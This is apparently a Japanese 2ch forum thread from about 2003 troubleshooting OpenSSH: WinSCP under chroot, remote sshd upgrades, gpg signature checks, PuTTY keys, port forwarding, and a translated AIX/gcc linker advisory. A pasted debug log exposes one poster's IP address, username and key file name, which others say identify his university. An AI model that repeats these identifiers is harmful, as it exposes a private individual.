具体的にどうチャレンジしたん？ほんとに上の通りの設定だとしたら、
host-B のユーザが root じゃなきゃ port を開けないわけだが。

CHROOTされた環境でのWINSCPの使用について教えてください。
http://mail.incredimail.com/howto/openssh/
↑このページを参考にしてOpenssh3.5を入れてみたんですけど、
winscpがうまく使えませんでした。chrootして接続できるの
ですが、実際にファイルのコピーができないのです。
OSはRedHat7.2,7.3両方で試したのですが、、、。
何か方法ご存知の方いらっしゃいますか？

不安定な回線から使ってて、回線が切れてもセッション維持する事って出来ませんか

>>708 screen

>>709
調べてみます。
どもありがと

>>708＝>>710
GNU screen その2
http://pc.2ch.net/test/read.cgi/unix/1048030339/l50
の１にあるリンク先とか

# というか、全然SSHとか関係ない罠（ｗ

>>707
> 何か方法ご存知の方いらっしゃいますか？

とりあえず、WinSCP が吐く log 見てみれば、何か分かるのでは？

>>707
私はWINSCPを利用したことがないのですが
http://www.sdri.co.jp/rssh/faq.html.ja
に依ればWINSCPは
「コマンドラインの ssh ツールに GUI フロントエンドを提供する小さなハック」
で、
「ユーザが ssh を通してファイルシステムを操作するためのコマンドを実行できることが必要である」
ということです.

厨質問でごめん。
sshで接続しているサーバのsslとsshをアップデートする場合
sshdをkillすることになるので作業できなくならない？

>>714
SSH ログインした状態で ps -ef | grep sshd してみ。
子プロセスの方を残しておけばセッションは切られない。はず。
もちろん失敗するとログインできなくなるので
local でやった方が無難ではある。

> local でやった方が無難
レンタルサーバの人はどーすれば？（ｗ

>>716
>>715の「はず」に期待するかtelnetでも開けておけばいいでしょ

httptunnel+sshで接続したDebianサーバ上で /etc/init.d/ssh restart を
実行しても切れなかった。

>>716
知らねーよ。
リスクを理解した上でそういう環境使ってるなら
どうすればいいかは自分で考えるべきだろ。

>>714
kill することになるのですか本当ですか？

漏れはそれが嫌なのでinetdからsshdを上げるようにしている。
最近のCPUは速いから遅くもなんとも感じねー

>716
ポートずらす

>>716
前のバージョンを残しておけばいいんじゃないの？

>>723
sshd 落ちた状態で不意に SSH セッション切れちゃったら、
そっから先は一体どうすりゃええねん、っつー話でしょ。

だからkillする前に前のバージョンを別のポートで動かしとけばいいんじゃないのかな

daemontools から上がるようにしとけば不意に sshd 落ちちゃっても復活する？

libcrypto.so の変更にコケたら daemontools を使おうが inetd だろうがコケる。
libcrypto.a なら関係ないけど。

オペミスの可能性もあるし。

>>727
んじゃ、万が一のために static link した sshd のバイナリを作っといて、
作業中には inetd か何かで別ポートで上げとく、これでどうよ？
＃ って、そんな引っ張るネタでもねえな、そろそろやめときまつ。

OpenSSH 3.6, 3.6p1 がリリースされました。
変更点の拙訳を
http://www.unixuser.org/%7Eharuyama/security/openssh/henkouten_3.6.txt
に置きました.

えっ! まだ出とらんぞ。

>>731
出てるけどミラーが行き渡ってないだけでしょ。

>>731
出てるYO! アナウンスメール:
http://www.mindrot.org/pipermail/openssh-unix-announce/2003-March/000058.html

＞春山san
早いっすね！いつもどうもです m(__)m
ちなみに、前スレはhtml化されてます:
　　ssh
　　http://pc.2ch.net/unix/kako/976/976497035.html

本当だ。
どうも

scpに-1が渡せるのうれしいな。いままで-oProtocol=1してたから。

マニュアル翻訳しますた。
間違いがありましたらご指摘いただければ幸いです。
http://www.unixuser.org/%7Eeuske/doc/openssh/jman/index.html

マニュアルを翻訳していて気づいた変更点は、

1. scp: -1, -2, -l (帯域制限) オプション追加
2. sftp: コマンドの前に "-" をつけるとエラーが発生しても終了しない。
3. ssh-add: -c オプション追加 (鍵を使用するときにユーザに確認をとる)
4. ssh-agent: -t (鍵のデフォルト生存時間) オプション追加。でも ssh-add で指定した値のほうが優先される。
5. ssh-keysign を使うには ssh_config で、HostbasedAuthentication のほかに EnableSSHKeysign = yes とする必要がある。

といったところですかね。

>>732
ftp.ayamura.org/pub/openssh がミラー頻度が多い

頻度は「高い」

3.6.1 になったようれす。

なにやら 3.6 に入れたバグフィックスが別のバグになってしまい、
他の SSH と通信が途切れるようになったため、これを防止したとのことです。

CVS Log:
The 'kex guesses' bugfix from OpenSSH 3.6 triggers a bug
in a few other SSH v2 implementations and causes connections to
stall. OpenSSH 3.6.1 disables this bugfix when interoperating
with these implementations.

>>738
「大きい」だろ

>>740
738じゃないが、一応
http://dictionary.goo.ne.jp/search.php?MT=%C9%D1%C5%D9&kind=&mode=0&jn.x=17&jn.y=11

ＯｐｅｎＳＳＨを手に入れて，署名も手に入れたんですけど，
肝心の公開鍵がどこにあるのかわかりません。
探し回ったけど見つからないです。
トロイの事件があったので気にしているんですけど，鍵がどこにあるか
教えてくれませんか？

ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/DJM-GPG-KEY.asc

>742
鍵じゃなくて署名だろ
鍵だったら鍵サーバにあるでそ

本体が落とせて署名が見つからないってあるかな
鍵サーバで探すとしてなにでサーチするんだろ

鍵サーバからはメールアドレスで検索できる
ただし、その鍵が信用できるものかどうかの検証、という問題が残るが

メールアドレスってだれのメールアドレス？

>>745
署名を確認しようとすると鍵 ID が表示されて
この ID の公開鍵が見つからないと言われたりする。
キーサーバを設定してあれば見つからない公開鍵は
自動的に取得してくれたりもする。
あとはこちらで

PGP / gpg スレ
http://pc.2ch.net/test/read.cgi/unix/1007324740/

>>743 ありがとうございました

とりあえず検証完了しました。

厳密には，743さんの教えてくれた鍵が正しいかどうか検証が必要ですが，
今回はbsdのサイトにおいてあったし，
opensshのサイトにおいてあった署名が無事検証できたので
とりあえずＯＫとしました。

このままだと，ただの教えて君なので，検証したメモを残しておきます。
今更かもしれないけれど，周りにgpg使っていない人も多いので多少は
意味があると思って書いておきます。

gpgのインストール
さすがにこれは省略

自分用の私有鍵と公開鍵の作成
$ gpg --gen-key

基本的にデフォルトの設定で進む

パスフレーズなどを入力すると，~/.gnupg/　以下に鍵などができる

$ gpg --list-keys
で確認

鍵のインポート
$ gpg --import DJM-GPG-KEY.asc
教えていただいた鍵を登録

$ gpg --list-keys
で確認

登録した鍵を，信用するために，自分の鍵で署名
$ gpg --lsign-key [email protected]

どれくらい信用するか聞かれるが，適当に答える。デフォルトでもよし。
本当はきちんと検証する必要がある。

ようやく，署名の検証が可能
$ gpg --verify openssh-3.6.1p1.tar.gz.sig

問題なければ終了。

sshdをkillしてssl,sshともにアップデートしましたがセッション切れずに
できました。
text file busyとかにもならないんだなぁ…もっと勉強しよう

>751
> text file busyとかにもならないんだなぁ

OS によってはなる

リモートにファイルを転送してそれを実行みたいなことをやりたいんだけど、
認証を一回で済まして、スクリプトで実行するには
どんな方法がありますか？

ssh-agentでパス打ち込むの一回だけとかって意味じゃなくて、
本当に認証を一回ですませたいんだけれど。
scpとかsftpで一度認証してるのに
sshで入りなおしてもう一度認証っていうのがアレなので。

>753
uuencode したものを流しこんで uudecode して実行するとか

ssh remote cat ">" script.tmp ";" sh script.tmp ";" rm script.tmp < my-script

>753
cat スクリプト | ssh REMOTE sh
とかじゃダメ？

バイナリファイルが実行したい場合は、754のように、
uuencodeした物をヒアドキュメントで埋め込んだスクリプトを作るとか。

>>754>>755>>756
なるほど、いろいろやり方があるんだなぁ。
いろいろ試してみようと思います。どうもありがとうございましたー

（＾＾）

すみません。教えてください。
ssh HOST "command"
とやるとき、シェル（デフォルトシェル？）を介して
コマンドを実行するんでしょうか、
それともシェルを介さずにコマンドが実行されるんでしょうか？

sshでログインできません。
自分の家の中のLAN内では問題なくできるのですが、
知人の家のマシンからログインさせたいのですが、できないのです。
とりあえずiptablesとかTCPラッパーは無効にしてます。
ルーターのバーチャルコンピュータの設定で転送先IPアドレスを
そのsshdが入ってるホストにしてます。クライアントはwinでputtyで鍵を生成しました。
その鍵をつかってLAN内からはアクセスできてます。しかし、友人の家からアクセスして
もらうとできないんです。could not load private key fileとかでるんです。
誰かアドバイスお願いします

>>759
ssh HOST ps auxw とかすれば分かるでしょ。
ps のオプションは違うかもしれんが。。。

putty って、鍵だけを別のマシンにもっていっても使えなかった
気がする。
友人のマシンで鍵を生成して、公開鍵をサーバ側に持っていったら
どうなる？

あ、その前に、公開鍵認証でなく、login pass でアクセスできるか
確認しておいた方がよいかも。

>>761
微妙だな。

sshd を ktrace とか strace 付きで動かしておいて出力を検分とかのほうが
確実か…

>>761>>763
わかりました。どうもありがとうございました。

>760
「友人の家」でも PuTTY を使っているのか？

違う実装、例えば OpenSSH とは鍵の互換性は無いよ。
変換は可能だが。

>>765 >>762
返事ありがとう。
とりあえず、puttygenだけ相手に渡して、向こうで鍵をつくってもらいました。
それで公開鍵をサーバーに置いたけど、アクセスできない・・・
友人がつくった鍵をもらって、自分の家のLAN内からアクセスするとやっぱり
接続できる。次にPasswordAuthentication yesに設定してパスワードで
ログインさせようとするもできませんでした。以下がエラーメッセージです。

login as: hogehoge
Sent username "hogehoge"
Trying public key authentication.
No passphrase required.
Couldn't load private key from C:\putty\id_rsa_hoge.

パスワード認証しようとすると

[email protected]'s password:
Access denied

となるのです。

>766
アドレスでアクセス制限でもしてるんじゃないの？

>>767
それはsshd.configの中でできるのですか？
特にそういうことはしてないのですが。
ほかにどういう可能性がかんがえられるのでしょう？
ちなみにtelnet,ftp,等は接続できてますので、
やはりsshの問題と考えているのですが

>>768
デバッグモードで問題の絞り込みぐらい城

くれぐれも、デバッグモードってどうやるの、とか聞くなよ

>>769
う・・・
わからないです。
調べます

>>770（=>>760）
とりあえず、
　　　http://www.unixuser.org/~euske/doc/openssh/jman/
嫁！sshd(8)の -d オプションがそれ。「またサーバは fork せず、1回の接続しか
受けつけません。」ということなんで注意！
　　　[server]# sshd -ddd

　　 ∧＿∧
　　（　　＾＾ ）＜ ぬるぽ（＾＾）

#KerberosAuthentication no
#PermitUserEnvironment no

sshd_config(5)によればどちらも「デフォルトは``no''」と書いてあるのに
コメント外したらsshdが起動しないのはなぜ？

>>773
> コメント外したらsshdが起動しないのはなぜ？

--with-kerberosX 辺りを付けて configure してないと、この option
項目の存在そのものがなかったものとして扱われるため。

> #PermitUserEnvironment no

だけなら起動するのでは？

すいません。教えてくださいです。
環境は
redhat 8.0
ADSL-acca12M
です。
ハブを使って二台のパソコンを配線しています。

winXPパソコンからttsshを使ってLinuxのパソコンにログインしようとすると、
しばらして、「Cannot connect the host」とエラーが出るんです。
Linux側でSSHは起動しています。
初心者ですが、よろしくお願いします。

>>775です。
ごめんなさい。ここUNIX版でした。
Linux版に移ります。

>>776
かまわんと思うが。

それだけじゃわからん。ssh -v した結果はってよ。

>>775
hosts.allow にssh を許可するIP アドレスが無いんじゃないですかねえ

あ、redhat 8.0 だったらxinetd の方かもしんないです。スレ汚しｽﾏｿ

>>780
RedHatではsshdの起動にwrapperの類いは使ってないのであります。

たぶん/usr/sbin/lokkitでsshのポートを開けると繋がるんじゃないかなあ。
デフォではwell knownなポートは全部rejectするようになってたと思う。

>>775です。
みなさんありがとうございます！！
lokkitでsshのポートを開けたらログインできました！
お騒がせしました！！（泣！！）

会社のRedHat8に自宅のOpenBSDのsshd_config突っ込んだら動かなくなった。
しかもリモートから。明日会社に行ったら怒られるんだろうなぁ。

OpenBSD って事は portable かそうでないかって言う違い？
それとも RedHat8.0 標準が OpenSSH_3.4p1 だから？

kerberos

kerberos関連とUsePrivilegeSeparationとCompression削除で解決。
UsePrivilegeSeparation使えないと気持ち悪いが、まぁいいか。

3.6.1p2 age

3.6.1p2公開のアナウンスメール：
http://www.mindrot.org/pipermail/openssh-unix-announce/2003-April/000060.html

aixgcc.adv：
http://www.mindrot.org/pipermail/openssh-unix-announce/2003-April/000061.html


>>787
乙！

「3.6.1p2公開のアナウンスメール」（URLは>>788参照）の日本語訳書いときます
（ただし"Changes since OpenSSH 3.6.1p1"の部分だけ）

3.6.1p1からの変更内容
============================

* SECURITY: AIX/gccでのリンク時の問題を修正。AIXユーザは直ちにアップグレー
　ドすることが推奨される。詳しくは別のアドバイザリ(aixgcc.adv)を参照のこと。
* Irixでのビルド時における問題を修正した。
* AFSサポート付きでビルドする際の問題を修正した。
* Openwall Linux から提供されたパッチのいくつかをマージした。

ちなみに、アナウンスメールにあるMD5チェックサムは openssh-3.6.1p2.tar.gz の
もののようです。（ファイル名が間違っている）

aixgcc.adv（URLは>>788参照）の日本語訳：

1. 影響を受けるシステム

　　3.6.1p2よりも前の移植版OpenSSHをAIX上で使用しているユーザは、その
　　OpenSSHがAIXのものでないコンパイラ（例えばgcc）でコンパイルされたもの
　　である場合、この影響を受けます。

　　ただし、IBMから提供されているOpenSSHのパッケージはこの影響は受けないこ
　　とに注意して下さい。

2. Description

　　AIXのランタイムリンカは、デフォルトでは、ダイナミックライブラリを、シス
　　テムで規定されているパスから探す前にカレントディレクトリから探そうとし
　　ます。これは実行ファイルがset[ug]idされているかどうかにかかわらず行わ
　　れます。

　　この振る舞いは安全でないばかりでなく、極めて危険なことです。攻撃者は
　　ライブラリをすげ替えることによってより高い権限をローカルで搾取すること
　　ができてしまいます。

　　移植版OpenSSHはこのふざけた仕様に対処するための部分をconfigureスクリ
　　プトに含めていますが、それはあくまでAIX純正のコンパイラでのみ有効と
　　なっています。デフォルトの危険なAIXの振る舞いを変えていない場合、gccは
　　AIX純正のコンパイラとは異なるコマンドラインオプションを指定する必要が
　　あります。

3. 受ける影響

　　ローカルユーザが不正に高い権限を搾取することができてしまいます。

4. 短期的な回避方法

　　インストールされたバイナリからすべてのset[ug]idを取り除くことです。その
　　バイナリは、たいていは 'ssh-agent' と 'ssh-keysign' ですが、古いバー
　　ジョンでは 'ssh' も setuid されているかもしれません。

　　ただし、ssh-keysignからsetuidを取り除くことでHostbased認証ができなく
　　なることに注意して下さい。

　　移植版OpenSSH 3.6.1p2 では、危険なリンカの振る舞いを避けるために、正し
　　いオプションを使うようにしております。

5. 解決策

　　この問題を解決するためには、AIXのリンカが、デフォルトでシステムで規定
　　されているパスのみから(ダイナミックライブラリを)探し、かつset[ug]idされ
　　たバイナリに関してはカレントディレクトリやユーザが指定したディレクトリ
　　を決して探さないように変更しなければならない。

　　我々はこれを、IBMのリンカに含まれている深刻な欠陥であると考えており、
　　IBM側にこれを直ちに修正するよう主張する。IBMのﾔｼども、聞いてるかぃ？

6. Credits
は省略。

おしまい。
間違いとかあったら指摘よろしくです。


# >>793はコピペ荒らしなんで削除依頼出しときます。

1.にある「IBMから提供されているOpenSSHのパッケージ」のURLは
　　　ttp://oss.software.ibm.com/developerworks/projects/opensshi
な。追記忘れとる。。

>>795
># >>793はコピペ荒らしなんで削除依頼出しときます。
削除した為現在は存在しません。
出来れば荒らしにはレスを付けずにご依頼をお願いいたします。

>>797
あれ、「あぼーん」だけになるんじゃないのか。。。

>>798
申し訳ありません。通常削除するべきところを誤って透明削除してしまいました。

ttp://triaez.kaisei.org/~kaoru/diary/?200305a#200305045
GlobalKnownHostsFile をこんなふうにつかってるヤシいるのか

unixクライアント SSH1 から debian のサーバ openSSH1 に ssh したいのですが、
うまくいきません。
クライアント側で ssh-keygen1 して、public key をサーバの ~/.ssh/authorized_keys に
はりつけるだけですよね？
ssh -v したところ、以下のようなエラーでした。

********************************************************
debug: SshAppCommon/sshappcommon.c:133/ssh_app_get_global_regex_context: Allocating global SshRegex context.
debug: SshConfig/sshconfig.c:2232/ssh2_parse_config: Unable to open /home/yamamot9/.ssh2/ssh2_config
debug: Connecting to kuma, port 22... (SOCKS not used)
debug: Ssh2/ssh2.c:1977/main: Entering event loop.
debug: Ssh2Client/sshclient.c:1403/ssh_client_wrap: Creating transport protocol.
debug: SshAuthMethodClient/sshauthmethodc.c:85/ssh_client_authentication_initialize: Added "hostbased" to usable methods.
debug: SshAuthMethodClient/sshauthmethodc.c:85/ssh_client_authentication_initialize: Added "publickey" to usable methods.
debug: Ssh2Client/sshclient.c:1444/ssh_client_wrap: Creating userauth protocol.
debug: client supports 2 auth methods: 'hostbased,publickey'
debug: Ssh2Common/sshcommon.c:560/ssh_common_wrap: local ip = 131.112.51.200, local port = 51121
debug: Ssh2Common/sshcommon.c:562/ssh_common_wrap: remote ip = 192.168.4.128, remote port = 22
debug: SshConnection/sshconn.c:1930/ssh_conn_wrap: Wrapping...
debug: Remote version: SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1
debug: Ssh2Transport/trcommon.c:1306/ssh_tr_input_version: Remote version has rekey incompatibility bug.
debug: Ssh2Transport/trcommon.c:1309/ssh_tr_input_version: Remote version is OpenSSH, KEX guesses disabled.
debug: Ssh2Transport/trcommon.c:1648/ssh_tr_negotiate: lang s to c: `', lang c to s: `'

debug: Ssh2Transport/trcommon.c:1714/ssh_tr_negotiate: c_to_s: cipher aes128-cbc, mac hmac-sha1, compression none
debug: Ssh2Transport/trcommon.c:1717/ssh_tr_negotiate: s_to_c: cipher aes128-cbc, mac hmac-sha1, compression none
debug: Remote host key found from database.
debug: Ssh2Common/sshcommon.c:318/ssh_common_special: Received SSH_CROSS_STARTUP packet from connection protocol.
debug: Ssh2Common/sshcommon.c:368/ssh_common_special: Received SSH_CROSS_ALGORITHMS packet from connection protocol.
debug: server offers auth methods 'publickey,password,keyboard-interactive'.
debug: Ssh2AuthPubKeyClient/authc-pubkey.c:1536/ssh_client_auth_pubkey_add_file_keys: adding keyfile "/home/yamamot9/.ssh2/id_dsa_1024_grandma" to candidates
debug: server offers auth methods 'publickey,password,keyboard-interactive'.
debug: Ssh2AuthClient/sshauthc.c:316/ssh_authc_completion_proc: Method 'publickey' disabled.
debug: server offers auth methods 'publickey,password,keyboard-interactive'.
debug: Ssh2Common/sshcommon.c:155/ssh_common_disconnect: DISCONNECT received: No further authentication methods available.
warning: Authentication failed.
debug: Ssh2/ssh2.c:127/client_disconnect: locally_generated = TRUE
Disconnected; no more authentication methods available (No further authentication methods available.).
debug: Ssh2Client/sshclient.c:1478/ssh_client_destroy: Destroying client.
debug: SshConnection/sshconn.c:1982/ssh_conn_destroy: Destroying SshConn object.
debug: Ssh2Client/sshclient.c:1540/ssh_client_destroy_finalize: Destroying client completed.
debug: SshAuthMethodClient/sshauthmethodc.c:89/ssh_client_authentication_uninitialize: Destroying authentication method array.
debug: SshAppCommon/sshappcommon.c:146/ssh_app_free_global_regex_context: Freeing global SshRegex context.
**************************************************************

debug: Ssh2Common/sshcommon.c:155/ssh_common_disconnect: DISCONNECT received: No further authentication methods available.
warning: Authentication failed.

のあたりだと思うので、調べてみたのですが、よくわかりません。
ちなみに ssh2 から openSSH2 では ssh ログインできているのですが、
必要ができて ssh から openSSH へとログインしたい状態です。

よろしくお願いします。

大学、学科、名字までわかるログだな。

http://homepage.mac.com/hitomi18/

debug: Ssh2Common/sshcommon.c:560/ssh_common_wrap: local ip = 131.112.51.200, local port = 51121
（;´Д`）/lｧ/lｧ

設定ファイルも晒した方がいいかもな

>801
「unixクライアント SSH1」 とは ssh.com の ssh のことか？
OpenSSH の鍵とはフォーマットが違うが、変換はしたのか？

モロ出しﾊｧﾊｧ

>>801
> unixクライアント SSH1 から debian のサーバ openSSH1 に ssh したいのですが、
> うまくいきません。

そりゃ、そのでぶの Protocol が

>>802
> debug: Remote version: SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1

の通り version2 のみの設定になってるからだろう。SSH1 で繋げるた
めにはここが SSH-1.99-… となってなきゃあかん。

でぶの sshd_config の設定を見直せば治る。

>>809
openssh は最初から ssh1 も ssh2 も両方話せますよ、一応。

>>808
IP アドレスがばれている以上、晒すのは危険かも....

ssh -1
しとけばって話？

あ、漏れと同じ大学・・・。

ホストAにポートフォワーディングして
ssh -fNR 5910:localhost:5900 hostA
hostBから
vncviewer hostA:10
とやってもつながりません。
hostAから
vncviewer localhost:10
はつながります。
-Lでポートフォワーディングしてるときは-gをつければ同じようなことができたのですが、
-Rのときは-gをつけてもできません。どうすればいいですか

>>815
> -Lでポートフォワーディングしてるときは-gをつければ同じようなことができたのですが、
> -Rのときは-gをつけてもできません。どうすればいいですか

そりゃ client の指図でそんなことされちゃったら server も大変だ
ろう。

sshd_config の man page をよく読むよろし。

Redhat7.3でssh使ってるんですが、
ssh_exchange_identification: Connection closed by remote host
が出てアクセス出来ないというのはどのような原因が考えられますか？

以下が詳細です。
server: 192.168.0.3 client(w2k): 192.168.30.15と仮定します。
hosts.allowにはsshd : 192.168.30.15
hosts.denyにはALL : ALLと記述しています。
xinetd経由ではないのですが、sshdはhostsを読むという話を聞いたのでそうしています。
この状態でclient⇒Serverで上記のエラーを吐きます。
明日はhosts.allowにALL : 192.168.30.15と記述して試す予定ですが、
他にここもいじった方がいいというところがあればご指導お願いします。

>>816
そうですか。リモートのことですからね。ありがとうございました。

　　　　　　　　　　☆ ﾁﾝ　　　　　ﾏﾁｸﾀﾋﾞﾚﾀ〜
　　　　　　　　　　　　　　　　　　　　　　　　　ﾏﾁｸﾀﾋﾞﾚﾀ〜
　　　 　 　 ☆　ﾁﾝ　　〃　 Λ＿Λ　　　／￣￣￣￣￣￣￣￣￣￣￣￣￣
　 　 　 　 　　ヽ　＿＿_＼（＼・∀・）　＜　テポドン2まーだー？
　　 　 　 　 　 　 ＼＿／⊂　⊂＿ )　　 ＼＿＿＿＿＿＿＿＿＿＿＿＿＿
　　 　 　 　 　 ／￣￣￣￣￣￣ ／|
　　　　　　　　|￣￣￣￣￣￣￣|　 |
　　　　　　　　|　.愛媛みかん.　 |／

うごっ、誤爆ｽﾏｿ・・・吊ってきまつ

>>817
> Redhat7.3でssh使ってるんですが、
> ssh_exchange_identification: Connection closed by remote host
> が出てアクセス出来ないというのはどのような原因が考えられますか？

現象的には相手の identification_string (SSH-2.0-OpenSSH… とか
いうヤツ) を読んでる最中に \n が来る前に先方が接続を閉じちゃっ
たときに出るメッセージ。なので原因は分からんけど、

> hosts.allowにはsshd : 192.168.30.15
> hosts.denyにはALL : ALLと記述しています。

には関係なさそう (ここに来るのは hosts.* のチェック後)。

server/client の version を曝せばもう少し分かる (人がいる) かも。

> xinetd経由ではないのですが、sshdはhostsを読むという話を聞いたのでそうしています。

それは configure 次第。

でぶでapt-getしていれたばあい sshd_configは
Protocol 2

てなってるはず。

Protocal 2,1
にしてもよいけどいまさらプロトコル1つーのもナンセンスだと思う

>>822
TTSSH使っているユーザのために必要ってこともあろう。まぁそれでもPuTTY使え
っつーことになるんだろうけどな

2199年: sshd のセキュリティホールが利用される
http://www.securityfocus.com/news/4831
http://lists.insecure.org/lists/nmap-hackers/2003/Apr-Jun/0010.html

犯行現場を忘れておった
http://images.insecure.org/nmap/images/matrix/

2199年なのにアドレスがまだ IPv4 かよっ！

>>826
IP のバージョンと URL の表記に関連でも？

う、実はよく知らないのにネタにしてスマソ。
>>825のあちこちに出てくる「10.2.2.2」っていうのが
v4のIPアドレスだと思ったのよ。違うの？

826=828だけど824やなかった。カコワルイ＆ゴメソ。

SSHv1 は使うなって事か...
>>826
プライベートアドレスだし IPv4 でもいいんじゃない？

>>830
> SSHv1 は使うなって事か...
いや、単に既知の穴が使われただけなんでそうとも言えない。

まだ見ていないからわからんが、 /. では年代を錯覚させている場面だから、
IPv4でよい、みたいなことを言っていたような。

winscp2を使って、ssh2 rsa認証にてサーバーに接続していますが、
自分のホームディレクトリより上の階層が見えてしまいます。
皆さんはどのような対策をとっておられますか？
opensshにパッチを当ててインストールしなおして設定をいじれば良いようですが
opensshがアップデートされるとまた変更しなければならないようで
もっと良い方法をご存知の方教えていただけませんか？お願いします。

SSH1がマズイ理由ってのが
どう検索しても見つからない。

他のディレクトリ見えます。